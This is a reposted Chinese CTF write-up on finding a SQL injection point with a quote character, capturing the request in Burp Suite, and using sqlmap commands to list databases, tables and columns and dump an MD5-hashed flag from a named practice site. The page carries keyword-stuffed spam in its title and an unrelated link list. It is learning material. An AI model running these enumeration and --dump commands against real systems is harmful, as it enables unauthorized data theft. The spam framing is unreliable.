当前位置: 首页 > news >正文

扫描购物网站建设营销推广有哪些公司

扫描购物网站建设,营销推广有哪些公司,wordpress添加首页友情链接,怎么把网站链接做二维码使用sqlmap burpsuite sql工具注入拿flag 记录一下自己重新开始学习web安全之路③。 目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/ 首先判断网站是否存在SQL注入漏洞 1.找交互点 发现只有url这一个交互点,搜索框和登录…

使用sqlmap + burpsuite sql工具注入拿flag

记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/

首先判断网站是否存在SQL注入漏洞

1.找交互点

发现只有url这一个交互点,搜索框和登录框都没有。

2.找注入点

1

在唯一的交互点url中输入?id=2‘

2

发现回显不正常,说明该url是一个注入点

打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。

3

使用sqlmap工具。

1.查看数据库名称(message)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db

–current-db //列出当前所有数据库名称

db // datebase

4

2.查看数据表名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables

-D //指定数据库名称

–tables // 列出所有的数据表

5

3.查看数据列名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns

-D //指定数据库名称

-T // 指定数据表名称

–columns // 列出所有的列

6

4.查看数据

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump

-D //指定数据库名称

-T // 指定数据表名称

-C // 指定数据列名称

–dump // 读取数据

7

MD5解密

8

遇到的问题

抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。

9

http://www.rdtb.cn/news/13227.html

相关文章:

  • 网站如何提交给百度nba最新交易一览表
  • 网络公司品牌推广快抖霸屏乐云seo
  • 遵义网站建设哪家好?网络营销的理解
  • 网站建设收费标准服务做手机关键词快速排名软件
  • 一个网站怎么做新闻模块百度seo报价方法
  • 微信小程序自己制作seo营销推广
  • 成都 企业网站建设公司网络营销的内容主要有哪些
  • 做优惠网站多少钱培训学校怎么招生
  • 怎么用网站做调查表百度竞价推广是什么工作
  • 我的世界充值网站怎么做网站优化是什么
  • 淄博网站优化首选公司网站推广公司电话
  • 网站域名跳转怎么弄好消息tvapp电视版
  • 企业vi设计公司价格搜索引擎优化的核心及内容
  • 长沙百度快速优化排名厦门关键词优化企业
  • 佛山网站建设设计网站流量统计分析
  • 网站首页在哪个文件夹站长工具域名
  • 常用的电子商务网站开发技术足球比赛直播2021欧冠决赛
  • 免费做期中考试的网站网站优化关键词排名公司
  • 做网站seo赚钱吗百度权重排名查询
  • 网站开发的工作流程百度竞价托管运营
  • 腾讯云建设网站uc推广登录入口
  • 新手如何给自己的网站做优化福州网站关键词推广
  • 北京做网站源代码的自己怎么开电商平台
  • 上海比较好的公司排名网站seo诊断分析
  • 柳州旅游网站建设简述如何对网站进行推广
  • 网站开发合同违约责任上海网站建设公司
  • wordpress网站排行榜100个商业经典案例
  • 织梦装修设计网站模板百度的相关搜索
  • 网页设计与制作教程第六版百度关键词seo外包
  • 织梦dedecms电影网站模板正版google下载